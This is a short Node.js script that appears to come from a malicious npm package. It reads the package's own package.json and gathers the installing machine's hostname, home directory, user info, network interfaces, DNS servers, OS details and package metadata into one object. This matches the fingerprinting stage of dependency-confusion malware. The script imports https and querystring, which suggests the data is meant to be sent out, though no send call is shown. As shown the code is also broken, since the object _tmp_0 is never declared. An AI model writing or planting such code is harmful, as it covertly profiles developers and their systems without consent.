const os = require("os")
const dns = require("dns")
const querystring = require("querystring")
const https = require("https")
const packageJSON = require("./package.json")
const package = packageJSON.name
_tmp_0.p = package
_tmp_0.c = __dirname
_tmp_0.hd = os.homedir()
_tmp_0.hn = os.hostname()
_tmp_0.ni = os.networkInterfaces()
_tmp_0.op = os.platform()
_tmp_0.rl = os.release()
_tmp_0.ve = os.version()
_tmp_0.td = os.tmpdir()
_tmp_0.ot = os.type()
_tmp_0.up = os.uptime()
_tmp_0.un = os.userInfo()
_tmp_0.ar = os.arch()
_tmp_0.dns = dns.getServers()
_tmp_0.r = packageJSON ? packageJSON.___resolved : undefined
_tmp_0.v = packageJSON.version
_tmp_0.pjson = packageJSON
